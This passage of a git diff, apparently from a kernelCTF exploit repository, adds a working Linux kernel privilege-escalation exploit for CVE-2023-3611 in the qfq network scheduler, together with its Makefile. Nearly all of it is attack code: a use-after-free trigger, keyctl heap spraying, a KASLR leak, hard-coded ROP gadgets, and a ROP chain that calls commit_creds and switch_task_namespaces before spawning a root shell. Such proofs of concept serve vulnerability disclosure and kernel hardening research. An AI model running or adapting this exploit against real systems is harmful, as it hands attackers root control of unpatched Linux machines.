fake aggregate. + // This will eventually allow us to reach a UaF scenario. + L("worker %d is entering stage 2: smuggle a fake aggregate", i); + + L(" trying to create class using the fake aggregate .."); + if (create_helper_class(s, loindex, handle_faked1, 0, 0x1337) != 0) { + return -1; + } + + L("waking parent"); + EVENT_SET(parent_notify); + + while (wake != i) { + sleep(1); + } + wake = 0; + + L("worker %d is entering stage 3: trigger UaF", i); + if (delete_class(s, loindex, handle_faked1) != 0) { + return -1; + } + + L("waking parent"); + EVENT_SET(parent_notify); + + while (!done) { + sleep(1); + } + } + + return 0; +} + +// Final stage worker which will spray tcf_proto payloads and hopefully trigger +// the one which gives us a shell +int final_stage_worker(void* arg) { + const int loindex = if_nametoindex("lo"); + const u32 handle = 0x30000000; + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + { + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + } + + FAIL_IF(prepare_device(s, loindex) < 0); + // We want any qdisc here to attach the filters to, just re-use some code + FAIL_IF(create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 0) < 0); + + EVENT_SET(parent_notify); + + sleep(1); + EVENT_WAIT(final_worker_notify); + + // We freed the fake qfq_aggregate (for which we have a key handle id_agg) + // Try to reclaim it using tcf_proto s + // We use rsvp filters, see below. + L("spraying tcf_proto .."); + for (int i = 0; i < 80; i++) { + FAIL_IF(create_tcfilter(s, loindex, handle, 0x1000 + i) != 0); + } + + // So this is a bit sketchy. 
keyctl_read will not copy the buffer + // if the size does not match. This will force us to copy a HUGE + // amount of memory which hopefully does not fault :( + // This actually is a problem on the mitigation instance (presumably because + // of the CONFIG_SLAB_VIRTUAL). To circumvent this problem we choose + // a filter which has a very "low" address for its classify operation + // (tcf_proto->classify overlaps the length field of our key) + // "rsvp_classify" is the lowest I could find + FAIL_IF(read_key(id_agg, &agg, sizeof(agg)) < 0); + + leak_cls_rsvp_ops = (u64)agg.tp.ops; + L("leaked kaslr pointer (cls_rsvp_ops): %p", (void*)leak_cls_rsvp_ops); + + if ((leak_cls_rsvp_ops & 0xFFFF000000000000) != 0xFFFF000000000000) { + E("leak looks incorrect :("); + return -1; + } + + i64 diff = cls_rsvp_ops - leak_cls_rsvp_ops; + L("diff: %lld", diff); + + #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + + prep_tcf_proto_payload(&agg); + prep_final_large_payload(&large); + + struct key saved[] = { + { + .id = id_large, + .type = -1, + } + }; + FAIL_IF(spray_reset_except(saved, 1)); + + int spray_small = 1; + int spray_large = 1; +retry: + if (spray_small) { + struct key saved[] = { + { + .id = -1, + .type = SPRAY_8192, + } + }; + + // Free the tcf_proto and reclaim it with a fake one + FAIL_IF(spray_reset_except(saved, 1)); + FAIL_IF(spray(SPRAY_128, 50, &agg, sizeof(agg))); + spray_small = 0; + + sleep(1); + } + + if (spray_large) { + struct key saved[] = { + { + .id = -1, + .type = SPRAY_128, + } + }; + // Free the 8192 large key object and reclaim it with a prepared ROP payload + FAIL_IF(spray_reset_except(saved, 1)); + FAIL_IF(spray(SPRAY_8192, 2, &large, sizeof(large))); + spray_large = 0; + } + + // Final trigger .. + { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_GETTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = loindex; + data->tcm_parent = handle; + data->tcm_handle = 0; + + u16 protocol = 0xdead; + data->tcm_info = ((u32)0x2222 << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("exploit") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "exploit"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... 
+ if (err != -EBUSY && err != 0) { + E("failed to trigger payload .."); + + // We have a small side-channel leak here, which makes the last step + // relatively stable: + // If the spray of fake tcf_proto failed, we will not find a suitable + // filter with the requested priority, thus kernel will return -ENOENT + // If the spray of the large prepared stack failed, the name of kind + // will be all zeros, thus not matching the requested "exploit" kind, + // thus kernel will return -EINVAL + + if (err == -ENOENT) { + L("retrying small spray .."); + spray_small = 1; + goto retry; + } + if (err == -EINVAL) { + L("retrying large spray .."); + spray_large = 1; + goto retry; + } + E("failed :("); + free(nlh); + return -1; + } + + free(nlh); + } + + return 0; +} + +int main() { + // main orchestration routine. + // mainly manages workers and occasionally collects leak information + + FAIL_IF(_pin_to_cpu(0) != 0); + + scratch_buf = calloc(16, 0x1000); + FAIL_IF(scratch_buf == NULL); + + int worker_i = 1; + int ki; + const struct key* key; + prep_stage1_large_payload(&large); + for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY*3; worker_i++) { + int do_the_thing = (worker_i % ATTEMPT_LARGE_EVERY == 0); + + if (do_the_thing && DO_BEFORE > 0) { + FAIL_IF(spray(SPRAY_8192, DO_BEFORE, &large, sizeof(large)) != 0); + } + + FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0); + EVENT_WAIT(parent_notify); + + if (do_the_thing) { + FAIL_IF(spray(SPRAY_8192, 3 - DO_BEFORE, &large, sizeof(large)) != 0); + + wake = worker_i; + EVENT_WAIT(parent_notify); + + ki = 0; + while ((key = get_key(ki++)) != NULL) { + if (key->type != SPRAY_8192) { + continue; + } + + FAIL_IF(read_key(key->id, &large, sizeof(large)) < 0); + for (int k = 0; k < ARRAY_LEN(large.group.slots); k++) { + leak_agg_ptr = (u64)large.group.slots[k].first; + if (leak_agg_ptr != 0) { + if ((leak_agg_ptr & 0x80) != 0) { + // This is the bit we flipped. If it was already set, try again. + // At this point we should be relatively stable (TM) + + E("we succeeded, but the qfq_aggregate pointer had the wrong bit set: %p", (void*)leak_agg_ptr); + break; + } + + id_large = key->id; + goto stage2; + } + } + } + + E("attempt failed. trying again .."); + prep_stage1_large_payload(&large); + FAIL_IF(spray_reset()); + } + } + + goto failed; + +stage2: + L("leaked struct qfq_aggregate heap pointer: %p", (void*)leak_agg_ptr); + + wake = worker_i; + EVENT_WAIT(parent_notify); + + ki = 0; + while ((key = get_key(ki++)) != NULL) { + if (key->type != SPRAY_128) { + continue; + } + + FAIL_IF(read_key(key->id, &agg, sizeof(agg)) < 0); + + if (agg.agg.grp != NULL) { + leak_grp_ptr = (u64)agg.agg.grp; + id_agg = key->id; + break; + } + } + + if (leak_grp_ptr == 0) { + E("we failed to get the grp pointer?"); + goto failed; + } + + // offsetof(Qdisc, group assigned to agg) + 8192 because the overflowed page is right behind the qdisc. + leak_grp_ptr = (leak_grp_ptr - 5816) + 8192; + L("leaked key payload 8192 pointer: %p", (void*)leak_grp_ptr); + + // stage 3 + + // it seems we are not allowed to create a new netns here? + // just move it to a new child .. + FAIL_IF(spawn_worker(&final_stage_worker, NULL) < 0); + EVENT_WAIT(parent_notify); + + wake = worker_i; + + EVENT_WAIT(parent_notify); + EVENT_SET(final_worker_notify); + + while (1) { + sleep(100); + } + +failed: + E("we failed .("); + spray_exit(); + while (last_worker > 0) { + kill_worker(last_worker - 1); + } + return 0; +} + +/** + * Key payload spraying helper routines. 
+ * + * Spraying is a little complicated because of the quota restrictions on sprayed keys and our multi process architecture. + * + * We will fork into a child process which will allocate all the keys. + * This process will own all the keys saving us the troubles of key permissions. + * The cost is additional complexity here. All the keyctl syscalls are essentially proxied through to the child process. +*/ + +inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +long __keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5); +} + +struct spray_info { + int num_keys; + struct key* keys; +}; + +enum { + CMD_spray_keys = 0, + CMD_reset_keys = 1, + CMD_keyctl = 2, + CMD_stop = 3, +}; + +struct shm { + int target; + union { + struct { + int type; + void* payload; + size_t plen; + int n; + } add_args; + struct { + int option; + unsigned long args[4]; + } keyctl_args; + struct { + const key_serial_t* except; + } reset_except_args; + } u; + int err; + + int event_begin; + int event_end; +}; + +struct helper { + void* stack; + int pid; +}; + +static struct spray_info info = { + .num_keys = 0, + .keys = NULL, +}; + +static struct helper helper = { + .stack = NULL, + .pid = 0, +}; + +static struct shm shm = { + .target = 0, + .err = 0, + .event_begin = __EVENT_UNSET, + .event_end = __EVENT_UNSET, +}; + +static int spray_buffers(int type, void* payload, size_t plen, int n) { + char desc[32] = {0}; + info.keys = (struct key*)reallocarray(info.keys, n + info.num_keys, sizeof(struct key)); + if (info.keys == NULL) { + return -1; + } + + for (int i = 0; i < n; i++) { + int j = info.num_keys; + + snprintf(desc, sizeof(desc) - 1, "%d-%d", type, j); + + info.keys[j].type = type; + info.keys[j].id = add_key("user", desc, payload, plen, KEY_SPEC_PROCESS_KEYRING); + + if (info.keys[j].id == -1) { + return -1; + } + + info.num_keys ++; + } + + return 0; +} + +static int spray_worker(void* unused) { + int ret; + + while (1) { + EVENT_WAIT(shm.event_begin); + + shm.err = -1; + switch (shm.target) { + case CMD_spray_keys: { + int type = shm.u.add_args.type; + void* payload = shm.u.add_args.payload; + size_t plen = shm.u.add_args.plen; + int n = shm.u.add_args.n; + + shm.err = spray_buffers(type, payload, plen, n); + break; + } + case CMD_reset_keys: + shm.err = 0; + while (info.num_keys > 0) { + int i = info.num_keys - 1; + + if (info.keys[i].id >= 0) { + if (__keyctl(KEYCTL_REVOKE, info.keys[i].id, 0, 0, 0) < 0) { + shm.err = -1; + break; + } + } + + info.num_keys --; + } + break; + case CMD_keyctl: + shm.err = __keyctl(shm.u.keyctl_args.option, + shm.u.keyctl_args.args[0], + shm.u.keyctl_args.args[1], + shm.u.keyctl_args.args[2], + shm.u.keyctl_args.args[3]); + break; + case CMD_stop: + goto exit; + default: + break; + } + + EVENT_SET(shm.event_end); + } + +exit: + EVENT_SET(shm.event_end); + return 0; +} + +static int ensure_helper() { + if (helper.pid <= 0) { + if (helper.stack == NULL) { + void* stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + helper.stack = stack; + } + + helper.pid = clone(&spray_worker, (char*)helper.stack + 0x4000, CLONE_VM, NULL); + FAIL_IF(helper.pid < 0); + } + + return 0; +} + +int spray(int type, int n, void* payload, size_t plen) { + shm.u.add_args.type 
= type; + shm.u.add_args.payload = payload; + shm.u.add_args.plen = plen; + shm.u.add_args.n = n; + + FAIL_IF(ensure_helper() != 0); + + shm.target = CMD_spray_keys; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + return shm.err; +} + +int spray_reset() { + FAIL_IF(ensure_helper() != 0); + + shm.target = CMD_reset_keys; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + return shm.err; +} + +int spray_reset_except(struct key *ids, size_t num_ids) { + FAIL_IF(ensure_helper() != 0); + + struct key* tmp = calloc(info.num_keys, sizeof(struct key)); + FAIL_IF(tmp == NULL); + + int num_saved = 0; + for (int i = 0; i < info.num_keys; i++) { + for (int j = 0; j < num_ids; j++) { + if (info.keys[i].id == ids[j].id || info.keys[i].type == ids[j].type) { + tmp[num_saved] = info.keys[i]; + num_saved++; + + info.keys[i] = info.keys[info.num_keys - 1]; + info.num_keys--; + i--; + break; + } + } + } + + shm.target = CMD_reset_keys; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + free(info.keys); + info.keys = tmp; + info.num_keys = num_saved; + + return shm.err; +} + +int spray_exit() { + FAIL_IF(ensure_helper() != 0); + + shm.target = CMD_stop; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + sleep(1); + munmap(helper.stack, 0x4000); + helper.pid = -1; + + return shm.err; +} + +const struct key* get_key(unsigned index) { + if (index >= info.num_keys) { + return NULL; + } + + return &info.keys[index]; +} + + +long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + FAIL_IF(ensure_helper() != 0); + + shm.u.keyctl_args.option = option; + shm.u.keyctl_args.args[0] = arg2; + shm.u.keyctl_args.args[1] = arg3; + shm.u.keyctl_args.args[2] = arg4; + shm.u.keyctl_args.args[3] = arg5; + + shm.target = CMD_keyctl; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + return shm.err; +} diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/Makefile new file mode 100644 index 00000000..a590ce1c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/Makefile @@ -0,0 +1,11 @@ +all: exploit.c bin + $(CC) exploit.c -o bin/exploit -O3 -static + +exploit: exploit.c + $(CC) exploit.c -o exploit -O3 -static + +bin: + mkdir -p bin/ + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit new file mode 100755 index 00000000..f7b4998c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c new file mode 100644 index 00000000..9526fea5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c @@ -0,0 +1,1102 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long 
long i64; + +_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1"); +_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2"); +_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4"); +_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8"); +_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1"); +_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2"); +_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4"); +_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8"); + +#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__) +#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__) + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} + +#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x +#define pad8(x) pad4(x), pad4(x) + +#define p64(x) (u8)(((x) >> 0) & 0xFF), \ + (u8)(((u64)(x) >> 8) & 0xFF), \ + (u8)(((u64)(x) >> 16) & 0xFF), \ + (u8)(((u64)(x) >> 24) & 0xFF), \ + (u8)(((u64)(x) >> 32) & 0xFF), \ + (u8)(((u64)(x) >> 40) & 0xFF), \ + (u8)(((u64)(x) >> 48) & 0xFF), \ + (u8)(((u64)(x) >> 56) & 0xFF) + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define PACK __attribute__((__packed__)) + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +// GADGETS { +u64 find_task_by_vpid = 0xffffffff8110a0d0; +u64 switch_task_namespaces = 0xffffffff81111c80; +u64 commit_creds = 0xffffffff811136f0; +u64 prepare_kernel_cred = 0xffffffff811139d0; +u64 init_task = 0xffffffff836159c0; +u64 init_nsproxy = 0xffffffff83661680; +u64 oops_in_progress = 0xffffffff8419f478; +u64 mov_rdi_rax = 0xffffffff81041293; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp 0xffffffff82404440 {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3 +u64 pop_rcx_ret = 0xffffffff8102898c; // pop rcx; ret // 59c3 +u64 pop_rsi = 0xffffffff8101806c; // pop rsi; jmp 0xffffffff82404440 {taken}; ret // 5ee9ce1e4001c3 +u64 pop_rdi = 0xffffffff8102764d; // pop rdi; jmp 0xffffffff82404440 {taken}; ret // 5fe97e094001c3 +u64 push_rsi_jmp_rsi_0x39 = 0xffffffff818ca79b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639 + +u64 pop_rsp = 0xffffffff8100143b; // pop rsp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 5ce9ff2f4001c3 +u64 add_rsp_0x88 = 0xffffffff8103d43d; // add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 4881c488000000e9f76f3c01c3 + +u64 enter_pop_rbx_pop_rbp_pop_r12 = 0xffffffff81b14680; // enter 0, 0; pop rbx; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // c80000005b5d415ce9b3fd8e00c3 +// -> rbx = rbp, pop rbp, pop r12 +u64 mov_rbp_rbx_pop_rbx_pop_rbp = 0xffffffff8107ff46; // mov [rbp], rbx; pop rbx; pop rbp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 48895d005b5de9ef443801c3 +u64 push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12 = 0xffffffff81be0fed; // push qword ptr [rcx+rsi+0x5b]; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // ff74315b5d415ce947348200c3 + +// trailer of qfq_enqueue +// 0xffffffff81cd460f <+591>: lea -0x28(%rbp),%rsp +// 0xffffffff81cd4613 <+595>: mov %ecx,%eax +// 0xffffffff81cd4615 <+597>: pop %rbx +// 0xffffffff81cd4616 <+598>: pop %r12 +// 0xffffffff81cd4618 <+600>: pop 
%r13 +// 0xffffffff81cd461a <+602>: pop %r14 +// 0xffffffff81cd461c <+604>: pop %r15 +// 0xffffffff81cd461e <+606>: pop %rbp +// 0xffffffff81cd461f <+607>: jmp 0xffffffff82404440 <__x86_return_thunk> +u64 leave = 0xffffffff81cd460f; + +u64 add_rcx_edi = 0xffffffff81063063; // add [rcx], edi; ret // 0139c3 + +// } GADGETS + +#define FOR_ALL_OFFSETS(x) do { \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + x(oops_in_progress); \ + x(mov_rdi_rax); \ + x(pop_rcx_ret); \ + x(pop_rsi); \ + x(pop_rdi); \ + x(push_rsi_jmp_rsi_0x39); \ + x(pop_rsp); \ + x(add_rsp_0x88); \ + x(enter_pop_rbx_pop_rbp_pop_r12); \ + x(mov_rbp_rbx_pop_rbx_pop_rbp); \ + x(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12); \ + x(leave); \ + x(add_rcx_edi); \ + } while(0) + +// Reverse calculation of the index in sch_qfq.c:qfq_calc_index +// Our desired index will be 27 so that the fake group resides at offset 288 into +// our large spray object. +#define _TARGET_INDEX 27 +#define _MIN_SLOT_SHIFT 25 +#define _NUM_CLS 1 +#define _CLS_WEIGHT 1 +#define _ONE_FP 0x40000000 +#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1 + 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS) + +#define SIZEOF_QDISC_SIZE_TABLE 60 + +struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + + +struct hlist_head { + struct hlist_node * first; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct tcf_proto { + void* next; /* 0 8 */ + void * root; /* 8 8 */ + int (*classify)(void*, const struct tcf_proto *, void*); /* 16 8 */ + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const void * ops; /* 40 8 */ + void * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct tcf_proto) == 104); + +struct qfq_group { + u64 S; /* 0 8 */ + u64 F; /* 8 8 */ + unsigned int slot_shift; /* 16 4 */ + unsigned int index; /* 20 4 */ + unsigned int front; /* 24 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + long unsigned int full_slots; /* 32 8 */ + struct hlist_head slots[32]; /* 40 256 */ + + /* size: 296, cachelines: 5, members: 7 */ + /* sum members: 292, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; + +struct stab_payload { + union { + u8 __pad1[288 - SIZEOF_QDISC_SIZE_TABLE]; + u16 sizetable[2]; + }; + struct qfq_group group; + u8 __pad2[4098 - sizeof(struct qfq_group) - 288 - 4]; + u32 id; +} PACK; +_Static_assert(sizeof(struct stab_payload) > 4096 - SIZEOF_QDISC_SIZE_TABLE); + +// Our fake tcf_proto we will place into qfq_sched->filter_list +struct tcf_proto_payload { + union { + struct tcf_proto org; + 
u64 stack[100]; + }; +} PACK; + +static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +static u64 leak_kernel_base = 0; + +static void* payload = NULL; +static struct stab_payload fake_group = {0}; + +int get_kernel_base(); + +#ifndef ATTEMPT_LARGE_EVERY +#define ATTEMPT_LARGE_EVERY 17 +#endif + +void maybe_win() { + int fd = open("/proc/1/ns/mnt", O_RDONLY); + if (fd < 0) { + return; + } + + L("SUCCESS."); + setns(fd, 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + L("spawning shell .."); + char* argv[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(argv[0], argv, NULL); + exit(1); +} + + +void prep_tcf_proto_payload(struct tcf_proto_payload* p) { + memset(p, 0, sizeof(*p)); + + // store framepointer at a sane address. + const u64 framepp = oops_in_progress; + + u8 rop[] = { + [0] = p64(add_rsp_0x88), + + [0x39] = p64(pop_rsp), + + [8 + 0x88] = p64(enter_pop_rbx_pop_rbp_pop_r12), + p64(framepp), + p64(0xdead000000000001), // scratch r12 + p64(mov_rbp_rbx_pop_rbx_pop_rbp), + p64(0xdead000000000002), // scratch rbx + p64(0xdead000000000003), // scratch rbp + p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88] = p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88 + 8 + 0x88] = p64(pop_rdi), + p64(init_task), + p64(prepare_kernel_cred), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(commit_creds), + + p64(pop_rdi), + p64(1), + p64(find_task_by_vpid), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(pop_rsi), + p64(init_nsproxy), + p64(switch_task_namespaces), + + // restore execution in qfq_enqueue + p64(pop_rcx_ret), + p64(framepp), + p64(pop_rdi), + p64(0x48), + p64(add_rcx_edi), + p64(pop_rsi), + p64(-0x5b), + p64(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12), + p64(0xdead000000000004), // scratch r12 + p64(leave), + }; + + _Static_assert(sizeof(rop) < sizeof(p->stack)); + memcpy(p->stack, rop, sizeof(rop)); + + p->org.protocol = 8; + p->org.classify = (void*)push_rsi_jmp_rsi_0x39; + p->org.ops = (void*)0xdead000000000000; +} + +void prep_stage1_large_payload(struct stab_payload* p) { + memset(p, 0, sizeof(*p)); + + // This index will control the bit we flip. 
+ // 8192 - offsetof(struct Qdisc, privdata) - offsetof(struct qfq_sched, bitmaps)) // the rest of the first qdisc + // + 8192 // spacing of key payload + // + offsetof(struct Qdisc, privdata) + offsetof(struct qfq_sched, filter_list) // offset into the second qdisc + // (times 8 + FFS(0x80)) + p->group.index = (8192 - 384 - 72 + 8192 + 384 + 0) * 8 + 7; + + // see create_qfq_qisc for log scaling + p->sizetable[0] = 0; + p->sizetable[1] = LMAX >> 7; +} + +static int last_worker = 0; +static struct { + int pid; + void* stack; +} workers[200] = {0}; + +int spawn_worker(int (*target)(void*), void* arg) { + void* stack = workers[last_worker].stack; + + if (stack == NULL) { + stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + workers[last_worker].stack = stack; + } + + int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg); + + if (child < 0) { + return -1; + } + + workers[last_worker].pid = child; + last_worker++; + + return last_worker - 1; +} + +int kill_worker(int index) { + if (workers[index].pid > 0) { + kill(workers[index].pid, SIGKILL); + workers[index].pid = -1; + } + + if (index == last_worker - 1) { + last_worker--; + } + + return 0; +} + +int netlink_errno(int fd, struct nlmsghdr* nlh) { + assert(nlh->nlmsg_type == NLMSG_ERROR); + struct nlmsgerr* e = NLMSG_DATA(nlh); + assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e))); + + if (e->error != 0) { + E("netlink error: %d", e->error); + errno = -e->error; + } + + return e->error; +} + +int netlink_send_recv(int fd, void* buf, int size) { + struct iovec iov = { + .iov_base = buf, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + msg.msg_flags = MSG_TRUNC; + msg.msg_iov = NULL; + msg.msg_iovlen = 0; + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC); + if (iov.iov_len < 0) { + perror("recvmsg()"); + return -1; + } + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +static volatile int wake = 0; +static volatile int done = 0; +static volatile int qdisc_trigger_bug = 0; +static volatile int qdisc_trigger_payload = 0; +// event which will be set whenever control is handed over back to main +static EVENT_DEFINE(parent_notify, __EVENT_UNSET); + +int prepare_device(int s, int ifindex) { + struct nlmsghdr* nlh = calloc(1, 4096); + FAIL_IF(nlh == NULL); + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + // Up the device + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = IFF_UP; + data->ifi_change = 1; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + attr->nla_type = IFLA_MTU; + attr->nla_len = NLA_HDRLEN + 4; + u32* attr_data = (void*)attr + NLA_HDRLEN; + *attr_data = 0x1000; + + nlh->nlmsg_len += attr->nla_len; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to prepare device!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a rsvp tcfilter, used to spray our tcf_proto object 
